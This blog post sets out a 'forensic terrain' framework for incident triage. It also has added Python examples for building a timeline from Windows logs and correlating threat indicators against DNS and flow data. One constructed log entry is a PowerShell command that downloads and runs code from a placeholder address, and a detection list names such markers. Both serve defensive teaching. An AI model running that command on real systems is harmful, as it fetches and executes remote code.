There is a moment every SOC analyst knows. The alert fires, the clock starts, and the first question is not “what happened” but “where do I look.” That question has no clean answer in the published literature. NIST SP 800-61 tells you the phases. MITRE ATT&CK tells you the techniques. The Diamond Model tells you how adversary, capability, infrastructure, and victim fit together. None of them tell you, in the moment of triage, which direction to point your eyes first and why.
This post introduces a decision framework built around a single organizing principle: forensic terrain. Not threat terrain. Not attack surface. Terrain, in the military sense of the word, meaning ground you can stand on, ground the adversary occupies, ground you can see from where you are standing, and ground that is obscured. An analyst making decisions at 2am during an active incident needs to know which terrain belongs to them, which terrain is contested, which terrain requires an intermediary to reach, and which terrain is effectively unreachable regardless of how important it looks on a diagram.
The framework emerged from notes on the non-forensic attribution work I contributed to while teaching at Purdue and work I did in the IC [1], [2], [3], [4], [5], and others. This stands on the shoulders of work by Andrew Pendergast and Christopher Betz, among others, in the period before their Diamond Model of Intrusion Analysis became the widely cited version of that thinking. The Diamond Model as published solved an attribution problem. This framework solves a different problem entirely: where does a working analyst start, and why does that order matter.
The Two Axes
The framework uses two axes. The first separates internal network space from external network space. The second separates assets and artifacts the defender controls from assets and techniques the adversary leverages. Those two axes produce four quadrants, and each quadrant has a distinct forensic character.

The language matters here. The adversary quadrants do not say “adversary controls” for internal assets. That framing is wrong and getting it wrong costs analysts time during incidents. When an adversary is living off the land inside your network, running PowerShell under a legitimate account, abusing WMI, hijacking a scheduled task that existed before they arrived, they do not control those resources. You do. You can pull the drive. You can image the system. You can kill the process. What the adversary holds is not control. They hold opacity. They planted something in territory you own, and they are counting on you not finding it before they finish what they came to do. That is an information asymmetry problem, not a control problem. The distinction matters because it changes the mission. You are not trying to take back control. You never lost it. You are closing a knowledge gap.
Internal / Defender Controls
This quadrant holds everything the organization generated, stored, and configured. Authentication logs, SIEM data, memory contents on live systems, file system metadata, registry hives, network flow data, PCAP if you are capturing it, group policy objects, certificate stores, backup snapshots, asset inventory, change management records, browser artifacts, email stores. The forensic richness here is unmatched anywhere else on the terrain map. This is also where the incident almost certainly surfaced. An alert fired from this quadrant. A correlation rule tripped. A user called the help desk. The analyst is already standing here when the clock starts.
The first priority in triage belongs here. Not because it is most important in some abstract sense. Because this is the ground the analyst can actually stand on, and because establishing a clean timeline from these artifacts is the prerequisite for everything else the investigation will attempt.
Internal / Adversary-Leveraged
This quadrant is the active battlefield. The adversary is not here with their own equipment. They arrived with your credentials, your tools, and your trust. PowerShell. WMI. Scheduled tasks that already existed. Legitimate remote access software. Accounts that cleared your authentication policies because they were supposed to. The techniques documented across the LOLBAS catalog represent an adversary strategy built entirely around this quadrant: bring nothing, take everything, and leave artifacts that look like Tuesday’s administrative work.
The forensic mission here is not eviction. The adversary does not own the hardware. The mission is detection and reconstruction. Every LOTL technique produces artifacts on systems the analyst controls physically and logically. The scheduled task is on your endpoint. The WMI subscription lives in your WMI repository. The PowerShell logs, if you configured script block logging, are in your event store. The adversary’s advantage is that they knew what they planted and you do not yet. Close that gap and the asymmetry is gone; the terrain was yours the whole time.
Evidence in this quadrant degrades faster than anywhere else. Process memory evaporates on reboot. Running tokens expire. In-flight lateral movement sessions terminate. This is the highest-volatility ground on the map, which is why it earns priority two in triage despite not being where the investigation starts.
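The two internal quadrants describe one procedure seen from both sides: build the timeline from logs you own, then find what the adversary planted and collect the volatile pieces first. The Python below is an added example, not code from the original post, that runs that reconstruction over a constructed SIEM export. The Windows event IDs (4624, 4104, 4698, 5861) and the artifact locations are real; the hosts, accounts, timestamps and the download URL are invented for the example.

```python
"""
Added example (not from the original post): reconstruct a timeline from
defender-controlled logs and classify living-off-the-land artifacts by where
they sit on your terrain and how fast they degrade. EVENTS is a constructed
SIEM export; hostnames, accounts, times and the URL are invented. The event
IDs and the artifact locations are real Windows ones.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

EVENTS = [  # constructed; deliberately out of time order, as a collector may deliver them
    {"ts": "2024-03-02T01:47:10Z", "host": "WS-0412", "id": 4104, "user": "CORP\\jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"ts": "2024-03-02T01:44:02Z", "host": "WS-0412", "id": 4624, "user": "CORP\\jdoe",
     "logon_type": 10, "src_ip": "10.20.30.40"},
    {"ts": "2024-03-02T01:52:33Z", "host": "WS-0412", "id": 4698, "user": "CORP\\jdoe",
     "task": "\\Microsoft\\Windows\\UpdateOrchestrator\\Refresh"},
    {"ts": "2024-03-02T02:03:15Z", "host": "FS-01", "id": 5861, "user": "CORP\\svc_backup",
     "consumer": "CommandLineEventConsumer", "filter": "__InstanceModificationEvent"},
    {"ts": "2024-03-02T01:58:40Z", "host": "FS-01", "id": 4624, "user": "CORP\\jdoe",
     "logon_type": 3, "src_ip": "10.20.30.44"},
    {"ts": "2024-03-02T01:30:00Z", "host": "WS-0412", "id": 4104, "user": "CORP\\jdoe",
     "script": "Get-ChildItem C:\\Users\\jdoe\\Documents"},  # benign, should be filtered out
]


@dataclass(frozen=True)
class Artifact:
    ts: datetime
    host: str
    user: str
    event_id: int
    kind: str       # what the adversary ran or planted
    lives_in: str   # where on your own terrain you go to collect it
    volatile: bool  # True if a reboot or session end destroys the evidence


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


# Crude script-block markers for the example; a real rule set would be richer.
SUSPICIOUS_PS = ("downloadstring", "iex ", "invoke-expression", "-enc", "frombase64string")


def classify(ev: dict) -> Optional[Artifact]:
    """Map one raw event to an Artifact, or None if it is not LOTL evidence."""
    base = dict(ts=parse_ts(ev["ts"]), host=ev["host"], user=ev["user"], event_id=ev["id"])
    eid = ev["id"]
    if eid == 4624 and ev.get("logon_type") in (3, 10):   # network or RDP logon
        return Artifact(**base, kind=f"logon type {ev['logon_type']} from {ev['src_ip']}",
                        lives_in="live session and token on the endpoint", volatile=True)
    if eid == 4104:   # PowerShell script block logging
        if not any(m in ev["script"].lower() for m in SUSPICIOUS_PS):
            return None
        return Artifact(**base, kind="PowerShell: " + ev["script"][:40],
                        lives_in="process memory now; script text persists in the PowerShell log",
                        volatile=True)
    if eid == 4698:   # scheduled task created
        return Artifact(**base, kind=f"scheduled task {ev['task']}",
                        lives_in=r"C:\Windows\System32\Tasks and the TaskCache registry key",
                        volatile=False)
    if eid == 5861:   # WMI permanent event consumer bound to a filter
        return Artifact(**base, kind=f"WMI subscription {ev['filter']} -> {ev['consumer']}",
                        lives_in="WMI repository (wbem\\Repository\\OBJECTS.DATA) on the host",
                        volatile=False)
    return None


def build_timeline(events: list) -> list:
    """Ground truth first: every artifact in time order, whatever its volatility."""
    found = [a for a in map(classify, events) if a is not None]
    return sorted(found, key=lambda a: a.ts)


def collection_order(artifacts: list) -> list:
    """Collection is not the timeline: volatile evidence first, then persistent, each by time."""
    return sorted(artifacts, key=lambda a: (not a.volatile, a.ts))


def hosts_touched(artifacts: list) -> list:
    return sorted({a.host for a in artifacts})


if __name__ == "__main__":
    tl = build_timeline(EVENTS)
    print("timeline:")
    for a in tl:
        print(f"  {a.ts:%H:%M:%S} {a.host:8} {a.event_id} {a.kind}")
    print("collect in this order:", [(a.event_id, a.host) for a in collection_order(tl)])
    print("hosts touched:", hosts_touched(tl))
```

The timeline answers “what happened, in what order”; the collection order answers the triage question the post is about, which is why the two functions deliberately sort on different keys.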
External / Defender Controls
This quadrant holds the organization’s external posture. BGP announcements and ASN registration. PKI infrastructure and the certificate transparency records for certificates issued in your name. Cloud tenancy and IAM configurations. MFA systems. Email authentication records. WAFs and managed perimeter services. Threat intelligence sharing relationships. Legal and law enforcement contacts. The domain names and DNS records the organization owns and operates.
Analysts underweight this quadrant during triage. The perimeter infrastructure is not going to disappear while you work the internal investigation, and its forensic artifacts do not degrade on the timescale of memory or live session data. That stability is why it sits at priority three. It is important, but it is patient. The work here during an active incident is less forensic investigation than tactical hardening: blocking known C2 infrastructure at the perimeter, verifying MFA is holding, confirming firewall rules are current. Sequence those blocks against the internal investigation: a block applied before the intrusion is scoped tells the adversary they have been seen and invites a move to infrastructure you have not mapped yet. The goal is stopping the bleeding at the boundary while the real investigative work happens inside.
One dimension of this quadrant practitioners consistently underutilize is the law enforcement and legal contact network. If the incident has a reportable dimension, the clock on notification obligations starts the moment certain thresholds are crossed. Knowing who to call and having that relationship established before an incident is preparation work that belongs here.
External / Adversary Controls
This quadrant contains everything the adversary actually owns. C2 servers. Exfiltration drop zones. Ransomware encryption keys. Phishing infrastructure. Exploit staging servers. Bulletproof hosting relationships. Anonymization infrastructure. Cryptocurrency wallets used for ransom payments or tool purchases. Stolen credential markets where your users’ passwords may already be sitting. And something analysts frequently forget to put on the map: the adversary’s prior reconnaissance knowledge of your environment. If they did passive recon six months before the incident you are currently investigating, they may know things about your network topology that you have since changed and forgotten.
The defining characteristic of this quadrant is inaccessibility. The analyst cannot touch any of it directly. This is not a failure of capability. It is a structural feature of the terrain. The correct response to this quadrant during triage is not investigation but intelligence production: correlating known indicators against your outbound traffic and DNS queries, and passing developed indicators to your threat intelligence relationships and law enforcement contacts. That passing of indicators to external parties is the primary action available in this quadrant. Everything else here requires someone else to act on your behalf.
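The one action this quadrant allows is correlation against terrain you do own, followed by handing the result outward. The Python below is an added example, not code from the original post, that does exactly that over constructed outbound DNS and flow logs: match a small indicator set (including subdomains of a known C2 domain), emit a BIND Response Policy Zone that sinkholes the hits at your own resolvers (the external / defender quadrant work described above), and produce a sharing record with the internal hostnames stripped. The indicator values, hostnames, log formats and the sinkhole name are all assumptions made for the example.

```python
"""
Added example (not from the original post): correlate known adversary
indicators against outbound DNS and flow logs the defender owns, then turn
the hits into an RPZ sinkhole zone and a sanitized record for sharing.
Indicators, hostnames, log line formats and SINKHOLE are constructed.
"""

IOC_DOMAINS = {"update-check.example", "cdn-static.example"}  # constructed C2 domains
IOC_IPS = {"203.0.113.9"}                                      # constructed C2 address
SINKHOLE = "sinkhole.corp."   # assumed internal sinkhole name (trailing dot = FQDN)

# Constructed resolver log: "<timestamp> <client host> query <rrtype> <qname>"
DNS_LOG = """
2024-03-02T01:47:09Z WS-0412 query A www.update-check.example
2024-03-02T01:47:11Z WS-0412 query A example-legit.example
2024-03-02T01:58:35Z FS-01 query A cdn-static.example
2024-03-02T02:10:02Z WS-0412 query A www.update-check.example
"""
# Constructed egress flow log: "<timestamp> <src host> <dst ip> <dst port> <proto>"
FLOW_LOG = """
2024-03-02T01:47:12Z WS-0412 203.0.113.9 443 tcp
2024-03-02T01:50:00Z HR-07 198.51.100.23 443 tcp
"""


def parent_match(name: str, ioc_domains: set) -> "str | None":
    """Return the indicator that `name` equals or is a subdomain of, else None."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in ioc_domains:
            return candidate
    return None


def iter_observations(dns_log: str, flow_log: str):
    """Yield (timestamp, internal host, observed value, kind) from both constructed formats."""
    for line in dns_log.strip().splitlines():
        ts, host, _q, _rtype, qname = line.split()
        yield ts, host, qname, "domain"
    for line in flow_log.strip().splitlines():
        ts, host, dst_ip, _port, _proto = line.split()
        yield ts, host, dst_ip, "ip"


def correlate(dns_log: str, flow_log: str, ioc_domains: set, ioc_ips: set) -> dict:
    """Map each indicator that was actually seen to hosts, sightings and first/last seen."""
    hits = {}
    for ts, host, value, kind in iter_observations(dns_log, flow_log):
        if kind == "domain":
            ioc = parent_match(value, ioc_domains)
        else:
            ioc = value if value in ioc_ips else None
        if ioc is None:
            continue
        h = hits.setdefault(ioc, {"type": kind, "hosts": set(), "count": 0,
                                  "first_seen": ts, "last_seen": ts})
        h["hosts"].add(host)
        h["count"] += 1
        h["first_seen"] = min(h["first_seen"], ts)   # ISO-8601 Z strings sort correctly
        h["last_seen"] = max(h["last_seen"], ts)
    for h in hits.values():
        h["hosts"] = sorted(h["hosts"])
    return hits


def rpz_zone(hits: dict) -> str:
    """BIND RPZ: sinkhole the domain and its subdomains; NXDOMAIN any answer carrying the C2 IP."""
    lines = ["$TTL 300",
             "@ SOA localhost. root.localhost. 1 3600 600 86400 300",
             "@ NS localhost."]
    for ioc, h in sorted(hits.items()):
        if h["type"] == "domain":
            lines.append(f"{ioc} CNAME {SINKHOLE}")
            lines.append(f"*.{ioc} CNAME {SINKHOLE}")
        else:   # rpz-ip trigger: <prefixlen>.<reversed octets>.rpz-ip
            rev = ".".join(reversed(ioc.split(".")))
            lines.append(f"32.{rev}.rpz-ip CNAME .")
    return "\n".join(lines)


def share_records(hits: dict) -> list:
    """What goes to the ISAC or law enforcement: indicators and timing, never internal hostnames."""
    return [{"indicator": ioc, "type": h["type"], "first_seen": h["first_seen"],
             "last_seen": h["last_seen"], "sightings": h["count"]}
            for ioc, h in sorted(hits.items())]


if __name__ == "__main__":
    found = correlate(DNS_LOG, FLOW_LOG, IOC_DOMAINS, IOC_IPS)
    for ioc, h in found.items():
        print(f"{ioc:24} {h['type']:6} hosts={h['hosts']} n={h['count']}")
    print(rpz_zone(found))
    print(share_records(found))
```

The subdomain walk in `parent_match` is the part that earns its keep: C2 operators rotate hostnames under a domain far more often than the domain itself, and a resolver-side match that only checks exact names misses most of that traffic.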
The Priority Sequence
The sequence follows access, not importance. You work what you can touch first.

Start with the internal / defender-controlled quadrant to establish timeline and ground truth. Without a clean timeline from your own logs, the rest of the investigation is hypothesis without foundation.
Move to the internal / adversary-leveraged quadrant because the threat is active there and the evidence is evaporating. Every minute spent elsewhere while a LOTL technique is running is a minute the adversary’s foothold deepens and the artifacts degrade.
Address the external / defender-controlled quadrant to harden the boundary in real time. This is operational rather than investigative work at this stage, but it matters.
Develop the external / adversary-controlled quadrant last during triage, not because it is unimportant but because you cannot act on it directly. Feed what you find to the people who can.
Scoring the Terrain
Three dimensions characterize each quadrant’s forensic value at any given moment: analyst access, evidence volatility, and containment leverage.
Analyst access measures how much direct control the analyst has over the artifacts. The internal / defender quadrant scores highest. The external / adversary quadrant scores lowest, effectively zero for direct action.
Evidence volatility measures how fast useful forensic material degrades or disappears. The adversary-leveraged internal quadrant scores highest here. Memory contents, running tokens, live session data, and in-flight lateral movement can vanish in minutes. The external / defender quadrant scores lowest, because your certificate infrastructure and firewall rules are not going anywhere on their own.
Containment leverage measures how much acting on a quadrant reduces the adversary’s ability to continue operating. The adversary-leveraged internal quadrant scores highest here too, because disrupting an active LOTL technique directly interrupts the current operation. This is why it ranks second in triage priority despite lower analyst access than the internal / defender quadrant.
When you weight access and volatility at double the weight of leverage, the internal quadrants dominate the early phases of incident response. When you reverse the weighting for post-incident threat hunting and deterrence work, the external adversary quadrant rises significantly. The terrain does not change. The analysis priorities do, depending on the phase of work.
Mapping to the NIST Incident Response Lifecycle
The framework behaves differently across each phase of the NIST SP 800-61 lifecycle. Understanding how the quadrant activity profiles shift across phases is what makes this a lifecycle tool rather than a static taxonomy.

Preparation is almost entirely your two quadrants. The adversary-leveraged quadrant scores near zero because there is no active compromise yet. The external adversary quadrant earns a small contribution through threat intelligence consumption: ingesting known TTPs and infrastructure to build detection logic and populate playbooks. The work of preparation is building visibility into your own terrain before the adversary arrives.

Detection and Analysis is where this framework lives. Both internal quadrants are fully engaged. The external adversary quadrant earns its highest score during this phase on IOC correlation: matching known adversary infrastructure against your outbound traffic, DNS queries, and SIEM data. This is the phase the quad chart was built to support.

Containment is when the external / defender quadrant finally earns its moment. C2 blocking at the perimeter, firewall rule updates, DNS sinkholes, MFA enforcement, credential revocation at scale. The adversary-leveraged quadrant remains high because containment requires identifying and shutting down the specific techniques actively running inside your environment. The external adversary quadrant drops near zero, because you still cannot touch their infrastructure.

Eradication is the one phase where the adversary-leveraged quadrant is the primary work surface. Every persistence artifact the adversary planted inside your systems, every modified scheduled task, every hijacked service, every stolen credential still valid in your environment, is something that exists on hardware you control. Cleaning it requires knowing exactly what normal looks like, which is why the internal / defender quadrant stays high for baseline verification. This phase is entirely an inside job.

Recovery mirrors Preparation in shape. You are rebuilding posture from clean baselines. The adversary-leveraged quadrant earns one high score here on re-infection monitoring. You need to watch for the same techniques re-emerging, which means maintaining detailed knowledge of what those techniques looked like in your specific environment.

Post-Incident Activity is the only phase where the external adversary quadrant earns meaningful scores across multiple dimensions. CTI sharing, attribution analysis, and indicator dissemination are the work of this phase. What you learned about their infrastructure, their tooling, and their TTPs goes out to your ISAC relationships, your law enforcement contacts, and back into your threat intelligence feeds to improve the next cycle’s Preparation phase. The loop closes here.
On Provenance and Tools
This framework draws on work I built during my time at Purdue. What I have described here solves investigator orientation. The literature has not adequately addressed how to investigate: courses like SANS teach tools, but very few places say this is how you run an investigation.
So what about AI slop? Every idea here is something I have lectured on or written about in some form, long before AI showed up. The use of AI is consistent with the AI statement on my blog. AI assisted the production of this post. It performed a literature search faster than I could manually, rendered the visualization work, and handled transcription while my partially paralyzed left hand made typing impractical today (I’ve a pinched nerve, don’t be a drama queen).
Every analytical position in this framework (the adversary-leveraged framing, the information asymmetry characterization, the access-based prioritization sequence, and the recognition that evidence volatility and containment leverage require separate scoring dimensions) came from the human cognition behind this blog. AI did not generate those positions. It responded to them. Thinking about the “AI wrote that” objection, I realized AI isn’t doing as much work as my graduate students did, it drinks way less, and I never get called about bail money.
That is an honest account of how this was produced. The reader can judge the framework on its merits.
The Core Claim
Forensic terrain analysis is not a novel academic contribution. It is a practitioner’s tool. The quad chart exists to answer one question under time pressure: where do I look first, and why does that order matter. The answer is access. You work the ground you can stand on. You work the volatile evidence before it disappears. You harden the boundary while the internal investigation runs. You feed indicators outward to the people who can act on the terrain you cannot reach.
The adversary’s advantage inside your network is not control. It is knowledge. They know what they planted. You do not yet. That gap is closeable. The terrain was always yours.
Dr. Sam Liles writes at sveoti.net. He serves as Captain, Writer, and CISO. His intelligence analysis publication EOTISEC produces ICD 203/206/503-compliant national security business intelligence reports available by subscription.